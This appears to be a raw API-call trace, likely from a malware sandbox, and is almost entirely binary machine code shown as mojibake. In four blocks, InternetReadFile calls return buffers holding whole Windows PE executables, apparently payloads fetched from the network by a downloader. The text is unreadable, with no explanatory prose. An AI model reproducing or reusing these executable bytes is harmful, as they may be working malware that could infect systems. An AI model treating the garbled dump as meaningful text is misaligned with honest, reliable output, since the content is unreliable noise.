þÿÿëëV‹ñW3ÿN‰>è5’N$è-’N4èsPN`èkPŽŒè’jdž¼<ÉI‰¾À‰¾Ä‰¾ÈèiæY‰8‰‹Æ_^ÃVW‹ù‹…ÉtQè_·¼‹ÎÇ<ÉIè6ÿvèmæYŒè܀O`è¯QO4è§QO$èĀO_^麀V‹ñW3ÿ9~‡˜ƒf_^ÃV‹ñjVè×åYY‹Æ^ÂV‹ñW3ÿ9~wƒf_^ËFjÿ4¸è°åYY‹Fƒ$¸G;~sÝëâSV‹ñ3ÛW¾d9u%Ž|è‹ÿÿÿ¾p9u9žŒ…=_^[ËÏèÛë΋Ïè=ëÚW‹ùxÿÿÿ‹‹@DŽ8xÿÿÿhÉIèhOðèóOàèëOÐèãOÀèۍO¬èӍOœèˍOŒèˏ|ÿÿÿ…Éuƒg„_ÃVéË VW‹ñ苶@…ö…É _^ÃV‹q…ö…Ü ^ÃW‹ùƒu&‹?…ÿu_ÃV‹w$‹Ïèij(WèŸä‹þYY…öuæ^_ÃÿwèÓäYëÏV‹ñ‹…ÉtQè˜þÿÿŽìè PŽ¼è&Ž¬èŽœèŽŒèN^éVW‹ù3ö‹D÷…À…N Fƒþ|î_^ÃSV‹ñ3ÛW8^ …T 8^u‹N‹y8…ÉtQè‰~ˆ^ ÿ_^[óëóV‹ñN è²µ‹Î諵j@VèÐãYY‹Æ^ÂU‹ìS‹ÙVW€{ ‹{u)‹E‹Ï‹0è~µ‰7ÇG ‹C€{ _^[u Æ@]‹8ëҋ@8ëî3ÀÇ€Md3Éf£2MA¢4Mj ‰ 8M‰ <M‰ @M¢PMf£üM‰ ôM‰ øM¹úX‰ M£DM£HM‰ LMÃU‹ìW‹ù€ …r Vj@èãYÿu‹ð‹Îè‹O‰N8‰w^ÿ_]ÂU‹ìV‹uW‹ùVƒgèëåŠFO ˆG‹F‰GŠFˆGF ƒaPèÉåŠF0ˆG0‹Ç_^]Â3Ò3À‰@‰A ‰QˆQ‰QˆQ‰A,‹Á‰Q ‰Q(ˆQ0ÃV‹ñƒ&NèWŽŒèþŽœè󍍎¬è荍Ž¼èݍŽìè LjèEâÇ$|ÉIƒ ‰ÿ ÇI‰F‹Æ^ÃjAZƒ @ƒêuõ‹ÁÃSV‹5˜ÆI3ÛW‹ùjXS‰‰GfÇG‰_‰_‰_‰_j[ÇG ÿÖSjˆG)ÿÖSh
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd† ÉOXfð. )®À«ö@P­˜ý` Pì €(¸©(@­”@ã(`S.text8¬®``.dataÀ²@À.rdataP+Ð,´@@.eh_framà@À.pdata( â@@.xdataø  ì@@.bss0€À.idataì Pö@À.CRT``@À.tlsp@À.rsrc(¸©€º©@@.reloc”@­«@BUH‰åH‰MH‰UL‰E D‰M(]ÃUH‰åHƒì èT‰öH‹Ú‹…Àt ¹èϨë ¹èèè^ H‹7Û‹‰è^ H‹Û‹‰è>2H‹gÙ‹ƒøuH‹)ÛH‰ÁèK;¸HƒÄ ]ÃUH‰åHƒì0H‹Û‹‰wH‹ÈÚ‹HgH‰D$ A‰ÑL@H1H‰ÂH#H‰Áè7¨‰)HƒÄ0]ÃUH‰åHƒì0ÇEüÿH‹¤ÙÇè=‰Eü‹EüHƒÄ0]ÃUH‰åHƒì0ÇEüÿH‹uÙÇè‰Eü‹EüHƒÄ0]ÃUH‰åHƒìpHÇEðÇEä0‹EäeH‹H‰EØH‹EØH‹@H‰EèÇEüë!H‹EðH;Eèu ÇEüëE¹èH‹öBÿÐH‹MÙH‰EÐH‹EèH‰EÈHÇEÀH‹MÈH‹EÀH‹UÐðH± H‰EðHƒ}ðu¨H‹&Ù‹ƒøu ¹è-§ë?H‹ Ù‹…Àu(H‹ÿØÇH‹BÙH‰ÂH‹(ÙH‰Áè§ë ÇèH‹ÍØ‹ƒøu&H‹ïØH‰ÂH‹ÕØH‰ÁèݦH‹¦Øǃ}üuH‹ƒØH‰E¸HÇE°H‹U°H‹E¸H‡H‹•×H‹H…ÀtH‹†×H‹A¸º¹ÿÐè8H‹ÕØH‰ÁH‹»AÿÐH‹ØH‰HýÿÿH‰ÁèŸèË/‹ H‰Áèsè),H‹[×H‹H‹ñH‰H‹ çH‹Ø‹ÎI‰È‰Áè ,‰Ö‹Ô…Àu ‹Æ‰Áè+¦‹Á…ÀuèÄ¥‹ªHƒÄp]ÃUH‰åHƒì H‹9×ÇH‹<×ÇH‹?×ÇH‹¢ÖH‰EøH‹Eø·f=MZt ¸é­H‹Eø‹@<HcÐH‹EøHÐH‰EðH‹Eð‹=PEt ¸éH‹EðHƒÀH‰EèH‹Eè··À= t = t)ëVH‹Eè‹@\ƒøw¸ëHH‹E苀ЅÀ•À¶Àë4H‹EèH‰EàH‹Eà‹@lƒøw¸ëH‹Eà‹€à…À•À¶Àë¸HƒÄ ]ÃUSHƒìHHl$@‰M H‰U(‹E ƒÀH˜HÁàH‰Áè¥H‰EðH‹E(H‹H‰EèÇEü鏋EüH˜HÅH‹EèHÐH‹H‰Áè,¥HƒÀHÀH‰Eà‹EüH˜HÅH‹EðHH‹EàH‰Áè°¤H‰‹EüH˜HÅH‹EèHÐH‹‹EüH˜H ÅH‹EðHÈH‹H‹MàI‰ÈH‰Á耤ƒEü‹Eü;E Œeÿÿÿ‹EüH˜HÅH‹EðHÐHÇH‹E(H‹UðH‰HƒÄH[]ÃUH‰åHƒì H‰MH‹EH‰Áè²£H…Àt¸ë¸ÿÿÿÿHƒÄ ]АÃff.„@1ÀÃff.„fUWVSHƒì(Hl$ H5 ºH‰ñÿ >H‰ÃH…ÀtkH‰ñÿB>H‹=û=H÷¹H‰ÙH‰ÿ×Hú¹H‰ÙH‰Æÿ×H‰©H…ötHH ¯éÿÖH 6HƒÄ([^_]éÿÿÿf„HYÿÿÿH5BÿÿÿH‰{©ë¼f„UH‰åHƒì H‹a©H…Àt H UéÿÐH‹ ŒH…ÉtHƒÄ ]Hÿ%ó<HƒÄ ]Аf.„fDUWVSHºÅgV/ëÔ'I‰ÊHI(E‹JHM‹BM‹IÉLÂIƒû†­I‹ZI‹RH¿OëÔ'=®²ÂI‹B H‰ÞH¯ßH‰ÕHÑÂHÁÆH¯ïHòL‰ÆHÁÆ L¯ÇHòH‰ÆHÁÅHÁÆH¯ÇHòIÁÀH¾‡Ê녱y7žH¯îL¯ÆH1êH‰ÝH»c®²ÂwÊë…H¯ÖHÁÅH¯îHÚH1êH¯ÖHÚI1ÐH‰ÂL¯ÆHÁÂH¯ÖIH1ÂH¯ÖHÚIr0LÚI9ñr`H»OëÔ'=®²ÂH‰ñI¸‡Ê녱y7žI»c®²ÂwÊë…fDH‹AøHƒÁH¯ÃHÁÀI¯ÀH1ÐHÁÀI¯ÀJI9ÉsØL‰ÈL)ÐHHÐHƒáøHñLAM9Ár5‹H¹‡Ê녱y7žH¯ÁL‰ÁH1ÐHºOëÔ'=®²ÂHÁÀH¯ÂHºùy7ž±gVHÂL9És2IºÅgV/ëÔ'I¸‡Ê녱y7ž¶HƒÁI¯ÂH1ÐHÁÀ I¯ÀH‰ÂI9ÉuâH‰ÐHÁè!H1ÐHºOëÔ'=®²ÂH¯ÂH‰ÂHÁêH1ÐHºùy7ž±gVH¯ÂH‰ÂHÁê H1Ð[^_]ÃHƒì8L‰D$PLD$PL‰L$XL‰D$(è3=HƒÄ8Ãff.„Hƒì8L‰L$XLL$XL‰L$(èx=HƒÄ8ÃAWAVAUATUWVSL‹\$hA‹;I‰ÊI‰ÔM…É„=C¶DÿIƒùv1HÇÂÿÿÿÿ„À„â½Ð¸)ÐIƒùˆ‡%KtøH‹ë@HɶA¶Jc ‹HÙÿá@A¶HHÁá0HÊA¶HHÁá(HÊA¶HHÁá HÊA¶HHÁáHÊA¶HHÁáHÊA¶HHÁáHʄÀ„Q½È¸ L‰ÆD)ÈÁà)ÈÁïK,"MK@¶ÿMhLuý‰û÷ۃã?éÁfI9ð„?‰ÂH‰ñÁêA‰ÓL)ÙL9Á‚ÁâH‰Î)ÐH‹M9òƒ¬‰ÁI‰ÓIƒÂIÓã‰ÙIÓëK YD¶YD¶9AÃH‰ÐEˆzüD‰ÙHÓà‰ÙHÓèIA¶¶@DØAˆJýI‰Ó‰ÁIÓã‰ÙIÓëK YD¶YD¶9AÃH‰ÐEˆzþD‰ÙHÓà‰ÙHÓèIA¶¶@DØAˆJÿƒø@w!L9î‚8ÿÿÿ‰ÂƒàÁêH)ÖH‹M9ò‚UÿÿÿI9ês/÷߃ç?‰ÁI‰ÓIƒÂIÓã‰ùIÓëOYA¶ E¶[AˆJÿDØL9ÕuÖI9ðt4HÇÂìÿÿÿH‰Ð[^_]A\A]A^A_ÃH‰òL)‰ÑÁâH)Î)ÐH‹ë›I9êr˜L‰âƒø@uÄëÉf„HǸÿÿÿH‰Ð[^_]A\A]A^A_ÃL‰Êë¤@AVAUATUWVSL‹\$`A‹3H‰ÕM…É„BC¶DÿIƒùv6HÇÂÿÿÿÿ„À„ä½Ð¸)ÐIƒùˆ‡(K\
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¼y’à 0ÐÐڟ @ @…ˆŸOÔÉà lŸ  H.textÀÏ Ð `.rsrcÔÉÌÔ@@.reloc à @B¼ŸHP*dtK´ž¸0 1s% ~Í%-&~Ìþ[s& %€Í(+o( 8Ðo) £%rprYp~* (+ ¢%rqpr¯p~* (+ ¢%rÇprp~* (+ ¢%r!prap~* (+ ¢(– o, 81(- sNsk~* }Ë~* s. (/ o0 }Ë{ËrqprÑp~* (+ o1   ,rãprp~* (+ +;rprap~* (+ o1 -{Ë(™+ {Ë(˜(2 þ  9:o3   (4 o5 o6 (7 {Ë(—  (2 þ  9ñs8 s8 s8 þOs9 ~Î%-&~Ìþ\s: %€Î(+þPs9 ~Ï%-&~Ìþ]s: %€Ï(+þQs9 ~Ð%-&~Ìþ^s: %€Ð(+o; þ9E{ˍ£%rip¢o< šr}p(7 (A(+o> s? (L(+oRo@ #>@(A (B ioC &ÞÞ(D þ9œþRs9 ~Ñ%-&~Ìþ_s: %€Ñ(+þSs9 ~Ò%-&~Ìþ`s: %€Ò(+þTs9 ~Ó%-&~Ìþas: %€Ó(+ÞÞo] o_þUsE ~Ô%-&~ÌþbsF %€Ô(+oaogþVsG ~Õ%-&~ÌþcsH %€Õ(+ocþWsI ~Ö%-&~ÌþdsJ %€Ö(+oeþXsK ~×%-&~ÌþesL %€×(+oi( +,dsk%o]% r£p(7 o_%sN oa%og%oi%sO oc%sP oeoQ ( +,dsk%o]% rµp(7 o_%sN oa%og%oi%sO oc%sP oeoQ ÞÞojþ, oQ (R :ÃúÿÿÞþoS ÜoT :%úÿÿÞ ,oS ÜÞ&Þ + *A”ñ,›:ÕåäɵDù4â $0sp rËp(U (V þ , Ýî( srÝpo&8žooW ooW (rùpo1   ,4sp  ¥%-oX šom oo +sp%om%oo Þ ÞXoþ  :NÿÿÿÞ ÞÞÞ+*ALPà1Ó 0’sN  ¥%Ю(Y sZ (U (V þ , ÝS( s¥%Ðz(Y sZ o&8òsooW o‹ooW oo(oÞÞÞooŠ(D - oŠ+rýpo‹oŒ(D - oŒ+rýpooŽ(D - oŽ+rýpoÜoŽrýp([   , o\ Xoþ  :úþÿÿÞ ÞÞ Þ+*AdzJÄzRÌoC8{}„0Ìs8 (U (V þ , Ý£( s¥%М(Y sZ o&8Csq%ooW ot%ooW o3 .þov%ooW ox%oo3 1þoz%ooW (] @Bj[!‘¶Yo|%ooW o~%r po(o€o{jþ,-(^    (_   (`
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $³Ù#÷q·p÷q·p÷q·p$´qüq·p$²q^q·p$³qâq·p$¶qôq·p÷q¶pŒq·p5ð³qåq·p5ð´qâq·p5ð²q£q·pó¾qöq·póµqöq·pRich÷q·pPELò\fà '8ªYsP@@Xê(Ø(&ð, Î`Í@PT.textš/0 `.BSs³@4 `.rdata¢P¤<@@.dataèÚà@À.reloc,ðº@B¹pØ[èÕ=hJ?BèÿeYÃjjhÙ[¹@Ù[èChT?BèàeYÃVWjè©Y¿Ù[‹ð‹ÏèFCjV‹ÏǐÙ[8TBèìGh^?Bè¨eY_^ù9Ù[é‹C¹8Ù[è\=hh?Bè†eYÃh|?BèzeYÃhr?BèneYù Ü[è.=h?BèXeYÃh†?BèLeYÃÌÌÌÌÌÌ̸àç[ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒäøQV‹ujèd¨ƒÄM QjVPèÎÿÿÿÿpÿ0è ӃÄ^‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒäøEPjÿuÿu ÿuè–ÿÿÿÿpÿ0èvӃÉÿƒÄ…ÀHÁ‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌ̃ì‹D$ WÀV‹ñ‰D$VÆD$RD$ÇÄRBPfÖèmmƒÄ‹Æ^ƒÄÂÌÌÌÌÌÌV‹ñWÀFPÇÄRBf֋D$ ƒÀPè:mƒÄ‹Æ^ÂÌÌÌÌÌ̋I¸ôËB…ÉEÁÃÌÌV‹ñFÇÄRBPèlmƒÄöD$t j Vè¢aƒÄ‹Æ^ÂÌÌ̍AÇÄRBPè?mYÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇAÌBÇÜRBÃÌÌÌÌÌÌÌÌƒì  $èÕÿÿÿhôéBD$Pè6mÌÌÌÌÌÌV‹ñWÀFPÇÄRBf֋D$ ƒÀPèjlƒÄÇÜRB‹Æ^ÂV‹ñWÀFPÇÄRBf֋D$ ƒÀPè:lƒÄÇÐRB‹Æ^Âh ÌBèC>ÌÌÌÌÌÌV‹ñWÀFPÇÄRBf֋D$ ƒÀPèúkƒÄÇèRB‹Æ^‹D$‹T$‰‰H‹T$øƒìVÿt$RÿP ‹t$‹H‹V‹I;Ju‹;u °^ƒÄÂ2À^ƒÄÂÌÌÌ̋AV‹t$‹V;Bu‹;D$ u°^Â2À^ÂÌÌÌÌÌÌÌÌÌÌÌ̋D$‹L$‰Ç@¨Ó[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒäðìˆ¡@C3ĉ„$„V‹uWÀW‹ù)D$ ÇD$0‹Æƒ~ÇD$4‰t$@v‹‰D$@‹vþÿÿÿ‡-ƒþw¹‰t$0‰L$4D$ ë[‹ÆƒÈ=ÿÿÿv¸ÿÿÿë ¹;ÁBÁ‰D$D$PD$$Pèª8‹È‰t$8‹D$‰D$<FPÿt$L‰L$0QèJo‹L$HƒÄ‹t$0‹E‹U ‰D$‰T$…ötK‹Á+ƃør#Fƒù‰D$0¹: D$ GD$ f‰ 0ÆD0ëjh0ÌBÆD$HL$(ÿt$Hjè6,‹T$ÿt$‹L$LQ‹ÊÿPƒ|$\T$H‹L$XGT$H‹D$4‹t$0+ƉL$QR;Èw*ƒ|$<‰D$8D$(GD$(ðVèn‹D$$ƒÄ Æ0ëÆD$ ÿt$ QL$0è¿+‹L$\ƒùv-‹T$HA‹Âùr‹PüƒÁ#+ƒÀüƒø‡¿QRè"^ƒÄ(L$ L$`ó~D$0fÖD$pWÀƒ|$tf~ÈÇÄRBfÖGGÈ)L$`G‰L$PD$ÆD$ Pè)i‹L$|ƒÄÇèRBƒùv)‹T$`A‹Âùr‹PüƒÁ#+ƒÀüƒøw>QRèœ]ƒÄ‹M‹Ç‹U ‰O ‹Œ$ŒÇôRB‰W_^3Ìè2]‹å] è”üÿÿèŽÛè‰ÛÌÌÌÌÌÌÌÌÌÌV‹ñFÇÄRBPèühƒÄöD$t jVè2]ƒÄ‹Æ^ÂÌÌÌV‹t$WÀW‹ùGPÇÄRBf֍FPèYhÇôRBƒÄ‹F ‹N‰G ‹Ç‰OÇSB_^ÂÌÌÌÌÌÌÌÌÌÌÌÌV‹t$WÀW‹ùGPÇÄRBf֍FPè hƒÄÇôRB‹F ‹N‰G ‹Ç‰O_^ÂÌ̸4ÌBÃÌÌÌÌÌÌÌÌÌ̋D$V‹t$ƒøu`D$ÇD$WÀPVÇFÇFè«5‹L$ƒÄ‰ÇF‰NÍB‹ ,ÍB‰HŠ 0ÍBˆHÆ@‹Æ^ÂWPèöP‹ÐWÀ‹ÊƒÄÇFÇFyŠA„Àuù+ÏQR‹ÎèK#_‹Æ^ÂÌÌÌÌöD$V‹ñt jVèÄ[ƒÄ‹Æ^ÂÌÌÌÌÌWÀ‹ÁfÖAÇA@ÌBÇ€SBÃÌÌÌÌÌÌÌÌƒì  $èÕÿÿÿh„éBD$PèvgÌÌÌÌÌÌV‹ñWÀFPÇÄRBf֋D$ ƒÀPèªfƒÄÇ€SB‹Æ^ÂöD$V‹ñÇŒSBt jVè.[ƒÄ‹Æ^ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌVj‹ñèr53ÀÇFf‰F‰Ff‰F ‰F$ˆF(‰F,ˆF0‹D$ÆFÇF ÆFÇF…ÀtPVè’NƒÄ‹Æ^ÂhLÌBèk8ÌÌÌÌÌÌÌÌÌÌÌÌÌÌV‹ñVè³N‹F,ƒÄ…Àt PèF̃ÄÇF,‹F$…Àt Pè/̃ÄÇF$‹F…Àt Pè̃ÄÇF‹F…Àt Pè̃ÄÇF‹F …Àt Pèê˃ÄÇF ‹F…Àt PèÓ˃ÄÇF‹Î^éÆ4ÌÌQV‹ñƒ>u&jL$èX4ƒ>u ¡øÙ[@£øÙ[‰L$è•4‹^YÃÌÌÌÌÌÌÌÌÌÌÌÌðÿAÃÌÌÌÌÌÌÌÌÌÌ̃ÈÿðÁA¸DÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̋I…Ét‹ÿP…Àt‹‹ÈjÿÃÌÌÌÌÌÌ̋A…Àt‹H…Ét‹ÁÃÀøiÌBÃÌÌÌÌ̋IV‹t$W<µ;q s ‹A‹…Àu!ë3À€ytèïK;p s ‹@‹_^Â3À_^ÂÌÌÌÌÌÌÌÌÌÌ̍AP¶D$PèlNƒÄÂÌÌÌÌÌÌÌÌÌÌÌV‹t$W‹|$;÷tSY¶SPè?NˆƒÄF;÷uì[_‹Æ^ÂÌ̍AP¶D$Pè"PƒÄÂÌÌÌÌÌÌÌÌÌÌÌV‹t$W‹|$;÷tSY¶SPèõOˆƒÄF;÷uì[_‹Æ^ÂÌ̊D$ÂÌÌÌÌÌÌÌÌ̋T$‹L$+ÊQRÿt$è[h‹D$ƒÄ  ̊D$ÂÌÌÌÌÌÌÌÌ̋T$‹L$+ÊQRÿt$è+h‹D$ƒÄ ÂÌV‹ñ‹FÇœSB…À~ ÿv è§Éë y ÿv è­WƒÄÿvèÉƒÄÇŒSBöD$t jVè¿WƒÄ‹Æ^ÂU‹ìƒäðƒì8¡@C3Ä
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†ì1cftÜð& *|Ð@@?"` € 00 PX°A(Ȃè.textX``.data0"@À.rdata @ $@@.pdataXP0@@.xdatað`4@@.bss€p€À.idata € 6@À.CRT`B@À.tls D@À.reloc°F@B/4ÀH@B/19]®Ð°L@B/31r€ ü@B/45‹ @B/57 À :@B/70ÚÐD@B/81åàH@B/97Ð^@B/113 r@B.rsrc0 0t@@Ãff.„@Hƒì(H‹µ41ÉÇH‹¶4ÇH‹¹4ÇH‹4f8MZuHcP<HЁ8PEtfH‹_4‰ ¥_‹…ÀtC¹èÉèDH‹5‹‰è,H‹í4‹‰èdH‹3ƒ8tP1ÀHƒÄ(йè†ë»@·Pfú tEfú uˆƒ¸„†{ÿÿÿ‹ø1ɅÒ•Áéiÿÿÿ€H‹ Á4è| 1ÀHƒÄ(ÃDƒxt†@ÿÿÿD‹€è1ÉE…À•Áé,ÿÿÿfHƒì8H‹•4LÖ^H×^H Ø^‹‰¬^H‹14D‹H›^H‰D$ èýHƒÄ8ÀATUWVSHƒì H‹3H‹=pqeH‹%0H‹pëf„H9Æ„g¹èÿ×1ÀðH±3uçH‹5`31ÿ‹ƒø„Z‹…À„¹Ç^‹ƒø„P…ÿ„iH‹…2H‹H…Àt E1Àº1ÉÿÐè¬H‹ …3ÿÏpH‹Ø2H ÁýÿÿH‰è蔋Ö]{HcÿHÁçH‰ùèDL‹%µ]H‰Å…ÛŽJHƒï1Û@I‹ èHpH‰ñèI‰ðH‰DI‹H‰ÁHƒÃèËH9ßuÎHïHÇH‰-]]èH‹Ñ1L‹B]‹ L]H‹L‰H‹7]èb‹ ]‰]…É„Æ‹]…ÒttHƒÄ [^_]A\Ãf„H‹5 2¿‹ƒø…¦þÿÿ¹èO‹ƒø…°þÿÿH‹ý1H‹ æ1èÙÇ…ÿ…—þÿÿ1ÀH‡éþÿÿf„ès‹…\HƒÄ [^_]A\Ãf.„H‹É1H‹ ²1Çèé3þÿÿfH‰Çéíþÿÿ‰Á艐Hƒì(H‹å0ÇèšýÿÿHƒÄ(ÃHƒì(H‹Å0ÇèzýÿÿHƒÄ(ÃHƒì(è7HƒøÀHƒÄ(АH éÔÿÿÿ@АUAWAVAUATVWSHì8H¬$€D)… )½)µ€èZH5s+H=¼+(5Å+(=®+EWÀL‹-[nH‹nL5µ+L=,ëfff.„¹'AÿÕHÇD$ 1ÉH‰òI‰øE1Éè+…ÀuÛ)uP)}@D)EÐD)EàD)EðD)ED)ED)E HÇE0ÇEÐhD)E`HÇEpHE`H‰D$HHEÐH‰D$@DD$0ÇD$(ÇD$ 1ÉHU@E1ÀE1Éÿ_mA‰Ä¹ˆAÿÕE…ätHÇD$ 1ÉL‰òM‰øE1É肅ÀtR¹¸ AÿÕHÇD$ 1ÉL‰òM‰øE1Éè]…Àt-¹¸ AÿÕHÇD$ 1ÉL‰òM‰øE1Éè8…Àt¹¸ AÿÕA¼_¹_AÿÕëA¼˜:H‹M`ÿÓH‹MhÿÓD‰áé»þÿÿfÿ%~nf.„fHƒì(H‹ÅH‹H…Àt"DÿÐH‹¯HPH‹@H‰ H…ÀuãHƒÄ(ÃfDVSHƒì(H‹Ó-H‹‰Áƒøÿt9…Ét ‰ÈƒéHÂH)ÈHtÂø@ÿHƒëH9óuõH ~ÿÿÿHƒÄ([^éSýÿÿ1ÀfDD@‰ÁJƒ<ÂL‰Àuðë­fD‹JY…ÀtÃDÇ6Yéqÿÿÿ1ÀАHƒì(ƒút…Òt¸HƒÄ(Ãf„è‹ ¸HƒÄ(ÐVSHƒì(H‹ã,ƒ8tǃútƒútN¸HƒÄ([^ÃfHáxH5ÚxH9ótßDH‹H…ÀtÿÐHƒÃH9óuí¸HƒÄ([^Ãf„è ¸HƒÄ([^Ãff.„@1ÀАVSHƒìxt$@|$PDD$`ƒ9‡Í‹H\*Hc‚HÐÿà€H@)òDA òyòqH‹q¹èsòDD$0I‰ØHê)ò|$(H‰ÁI‰ñòt$ 軐t$@|$P1ÀDD$`HƒÄx[^ÐH¹(ë–€H )놀HÙ(ésÿÿÿ@H9)écÿÿÿ@H)éSÿÿÿHS)éGÿÿÿÛãАVSHƒì8H‰ËHD$X¹H‰T$XL‰D$`L‰L$hH‰D$(è”A¸ºH R)I‰Áè¢H‹t$(¹èkH‰ÚH‰ÁI‰ðè­ èø€WVSHƒìPHc5&WH‰Ë…öŽH‹WE1ÉHƒÀf„L‹L9ÃrH‹P‹RIÐL9ŠAƒÁHƒÀ(A9ñuØH‰Ùè H‰ÇH…À„æH‹ÅVH¶HÁãHØH‰x Çè3 ‹W A¸0H H‹—V
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $̉£ˆèÍTˆèÍTˆèÍT[šÎU„èÍT[šÈU#èÍT[šÉUèÍTJiÉUšèÍT[šÌUèÍTˆèÌT èÍTJiÈUÔèÍTJiÎUèÍT{jÈU‰èÍT{j2T‰èÍT{jÏU‰èÍTRichˆèÍTPELþÔdfà 'Z¸éœp@P@d<à(& ("xðÀð¸ï@pt.text‹YZ `.rdata¶p¸^@@.data¼Ø0È@À.rsrcàÞ@@.reloc(" $à@B¹ øGèœDhëhBè^YÃj¸¿dBèK¸¼ÝGÇEð`ÝG‰EìƒeüǼÝGHrBÇEüh|CPhlÝGèÅNƒMüÿhõhB菃ÄèޏÃj¸þdBèô¸TÝGÇEðøÜG‰EìƒeüÇTÝGpwBÇEühèCPhÝGènNƒMüÿhøhB跎ƒÄ臏ÃhiB褎YÃhûhB蘎YÃhèúGè´NÇ$iB耎YÃj¹´úGèhiBèhŽYùäúGèCh1iBèRŽYÃh'iBèFŽYÃjjhpûG¹ ûGè”ah;iBè'ŽYÃVWjèÏàY¿pûG‹ð‹ÏèØajV‹ÏÇpûGЃBè~fhEiBèïY_^ùûGéb¹ûGè ChOiBè͍YùÙûGé,u¹ØûGèëBhYiB譍YÃjjh0üG¹àûGèóshciB莍YÃVWjè6àY¿0üG‹ð‹Ïè7t‹ÏÇ0üG¨„BÆxüGÆnüGèWf¡ˆüG‹ ŒüGƒ%hüGhmiB‰5|üG£püG‰ tüGè(Y_^ùÀüGèNBhiBèYÃhwiBèYÃVÿt$ ‹ñ3Àÿt$ @‰F‰FFPÇüuBèÀƒÄ ‹Æ^ÂVÿt$‹ñÇävBè/ YPNè„^Vÿt$ ‹ñ3Àÿt$ @N ‰F‰FÇèuBè©‹Æ^ÂVÿt$‹ñƒf$NÇ vBèy ‰v$‹Æ^ƒì$SU‹l$43ÀVW‹ñ‰D$ƒì ‹Ì‰U‰Fè(‹} j[…ÿtðÿG‹Çë‹ÃP‹Îè”#…ÿt‹Ïè\-€}t‹EL$(‰D$$E Pè“3ۍD$$Cë3À‰D$‰D$‰D$ ‹D$4‰D$D$‹Pè80öÃt‹L$ƒãý…Ét‹D$ +ÁƒàüPQèHYYöÃt L$(è;2D$8‹ÎPè _‹Æ^][ƒÄ$ÂVj‹ñèÜ ‹D$–€ÇvBƒb$ÇävB‹‰B‹Æ‰R$^ÂU‹ìQQVWÿu‹ñè½ÿÿÿƒì0ÇÈvB¾¨‹Ìƒ'ƒgèEøVPèð ƒÄ8;øtP‹Ïè2‹Mü…Étè#_ÆFv‹Æ^ÉÂj ¸bBè_Œ‹]3ÿ‹Ç‰Eèÿu è§ùY‹È‰Mä‹‹@‹t ‹D$;Ç|;÷v;Ç| ;ñv+ñÇëWÀfE܋Eà‹u܉EìSMÔè €}Øu j^‹Öé‰}ü‹ ‹A‹D%Àƒø@t<‹Eì;Ç|3;÷v-‹‹H¶D@P‹L8èõ<ƒøÿtsƒÆÿ‰u܋EìƒÐÿ‰Eì‰Eàëɋ ‹A‹L8‹Wÿuäÿu ÿP$;EäuE;×uA‹Eì;Ç|3;÷v-‹‹H¶D@P‹L8è<ƒøÿtƒÆÿ‰u܋EìƒÐÿ‰Eì‰EàëÉj^‹×ëj^‹Ö‰Uè‹‹@‰| ‰|$ƒMüÿë;‹M‹‹PыB j^ Æj3É9J8Eñ ðV‹Êè‘2¸Ö@ÃMüÿ3ÿj^‹]‹Uè‹‹HËW3À9y8Eð q òVèa2MÔè-‹Ãè;ŠÃÌÌÌÌÌj@¸bB赊3ۋÉEä‰Eàÿu èý÷Y‹Ð‰U܉]؋}‹‹I‹t9 ‹D9$;Ã|;óv‹Ë;Á| ;òv+òÁëWÀfEċEȋuĉuè‰EìWM¼èë8]Àu j^‹Ö髉]ü‹‹@‹D80‹H‰MЋÿPEÌPè Y‰EԍMÌè\‹‹I‹L9áÀƒù@tR‹Mì;Ë|K;óvE‹‹H·D9@P‹L98èT;·À¹ÿÿf;Èu j^‹Ö‰Uä‰UàëƒÆÿ‰uè‰uċMìƒÑÿ‰Mì‰MÈë±j^‹Ó‹E܋˅Ò…œ;Ë|_;ÃvY‹E ŠˆEЋMԋÿuÐÿP0·ÀP‹‹H‹L98èâ:·À‹Uä¹ÿÿf;ÈD։Uä‰Uà‹E܃Àÿ‰E܉E´‹M؃Ñÿ‰M؉M¸ÿE 땋Eè‹Mì;Ë|/;Ãv)‹‹H·D9@P‹L98èŠ:·À¹ÿÿf;Èu‹Uä ։Uà‹‹@‰\8 ‰\8$ƒMüÿëX‹EèƒÀÿ‰Eè‰EċMìƒÑÿ‰Mì‰MȋUä띋M‹‹PыB j^ Æj3É9J8Eñ ðV‹Êè70¸0@ÃMüÿ3Ûj^‹}‹Uà‹‹HÏS3À9Y8Eð q òVè0M¼èÓ‹Çèá‡ÃÌÌÌÌ̋ËD$=rPèYÅÀtPèd„YÃ3ÀËD$H#;Ȇˆ,QèJ„Y‹È…Ét A#ƒàà‰HüÃé ÍS‹ÙVW‹|$‹C‹3+ÆÁø;øvWè$‹3VWÿt$è÷ƒÄ ë<U‹k+îÁýV;ýv ‹t$UVèٍ®+ý‹sVWPèɃÄë Wÿt$èºƒÄ ]¾_^‰C[Âj,趃Y‰‰@‰@fÇ@ ÃS‹\$ U‹é¹ÿÿÿ;ÙwZjX;ØwSÿt$‰]U‰EèŠ/ƒÄ Æ+ë4VWQPSè‹ðNQèÞþÿÿSÿt$(‹ø‰]W‰}‰uèV/ƒÄÆ_^][Âèü-ÌS‹Ù¹ÿÿÿW‹|$;ùwQjX;øwjÿt$‰{S‰CèXƒÄ ë.VQPW裋ðNQèqþÿÿO‰Qÿt$$‰{P‰sèé.ƒÄ^_[Âè”-ÌV‹t$W‹ù‹N…Étèó"„Àt‹‰‹F‰G°ë2À_^Âƒì ‹Ìÿt$èí ‹D$‹L$ÿ0è*Ã|$V‹ñt#ÿt$èÑ‹D$Vÿ6ÿ0‹D$ÿ0臃ĉF^ 